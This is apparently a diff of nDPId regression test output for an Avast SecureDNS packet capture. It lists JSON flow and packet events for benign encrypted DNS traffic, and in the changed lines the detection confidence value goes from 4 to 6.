-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1625395217373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625395217373,"pkt":"YDjgxTWgeJS0JASgCABFAADMf00AADMRa1y11iOVwKgCZAG76OUAuMImoeSBgAABAAEAAAAAATIJc0VjVXJlRE5TBWF2QVNUA2NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625321673727,"flow_last_seen":1625321673848,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625321675283,"flow_last_seen":1625321675403,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625321673727,"flow_last_seen":1625321673848,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625321675283,"flow_last_seen":1625321675403,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":21,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":2150,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":10,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":55,"global_ts_msec":1625401091063} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401091063,"flow_last_seen":1625401091063,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625401091063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1625401091063,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625401091063,"pkt":"eJS0JASgYDjgxTWgCABFAABDKc0AAH8RdWXAqAJktdYjlc0FAbsAL8xY+0MBAAABAAAAAAAAATIJc2VDdVJFZE5TBWF2YXNUA0NPbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401091063,"flow_last_seen":1625401091063,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625401091063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401091063,"flow_last_seen":1625401091063,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625401091063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1625401091190,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625401091190,"pkt":"YDjgxTWgeJS0JASgCABFAADMtpAAADMRNBm11iOVwKgCZAG7zQUAuETH+0OBgAABAAEAAAAAATIJc2VDdVJFZE5TBWF2YXNUA0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401093323,"flow_last_seen":1625401093323,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625401093323,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1625401093323,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625401093323,"pkt":"eJS0JASgYDjgxTWgCABFAABDKdEAAH8RdWHAqAJktdYjldaaAbsALxAyzbUBAAABAAAAAAAAATIJc2VjVVJlRE5zBWFWQVN0A2NvTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401093323,"flow_last_seen":1625401093323,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625401093323,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401093323,"flow_last_seen":1625401093323,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625401093323,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1625401093443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625401093443,"pkt":"YDjgxTWgeJS0JASgCABFAADMuwEAADIRMKi11iOVwKgCZAG71poAuIigzbWBgAABAAEAAAAAATIJc2VjVVJlRE5zBWFWQVN0A2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625401093443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625395217252,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625401093443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625401093443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625395217252,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625401093443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":25,"packets-processed":24,"total-skipped-flows":0,"total-l4-payload-len":2580,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":12,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":66,"global_ts_msec":1625413810414} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625413810414,"flow_last_seen":1625413810414,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625413810414,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1625413810414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625413810414,"pkt":"eJS0JASgYDjgxTWgCABFAABDy3cAAH8R07rAqAJktdYjld4HAbsAL+Cz9gYBAAABAAAAAAAAATIJU0VDdXJlZE5TBUFWQXN0A0NPbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625413810414,"flow_last_seen":1625413810414,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625413810414,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625413810414,"flow_last_seen":1625413810414,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625413810414,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1625413810531,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625413810531,"pkt":"YDjgxTWgeJS0JASgCABFAADMKHAAADERxDm11iOVwKgCZAG73gcAuFki9gaBgAABAAEAAAAAATIJU0VDdXJlZE5TBUFWQXN0A0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625401091063,"flow_last_seen":1625401091190,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625413810531,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625401093323,"flow_last_seen":1625401093443,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625413810531,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625401091063,"flow_last_seen":1625401091190,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625413810531,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625401093323,"flow_last_seen":1625401093443,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625413810531,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":27,"packets-processed":26,"total-skipped-flows":0,"total-l4-payload-len":2795,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":13,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":73,"global_ts_msec":1625477697370} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477697370,"flow_last_seen":1625477697370,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477697370,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1625477697370,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625477697370,"pkt":"eJS0JASgYDjgxTWgCABFAABDQqcAAH8RXIvAqAJktdYjleMrAbsAL7nVV2EBAAABAAAAAAAAATIJc0VjVVJFZE5zBWFWQVN0A0NvbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477697370,"flow_last_seen":1625477697370,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477697370,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477697370,"flow_last_seen":1625477697370,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477697370,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1625477697487,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625477697487,"pkt":"YDjgxTWgeJS0JASgCABFAADMthcAADIRNZK11iOVwKgCZAG74ysAuDJEV2GBgAABAAEAAAAAATIJc0VjVVJFZE5zBWFWQVN0A0NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477700767,"flow_last_seen":1625477700767,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477700767,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1625477700767,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625477700767,"pkt":"eJS0JASgYDjgxTWgCABFAABD4k8AAH8RvOLAqAJktdYjlfvnAbsAL7tgPVoBAAABAAAAAAAAATIJc0VjVXJFRE5zBUFWQXN0A0NPTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477700767,"flow_last_seen":1625477700767,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477700767,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477700767,"flow_last_seen":1625477700767,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477700767,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 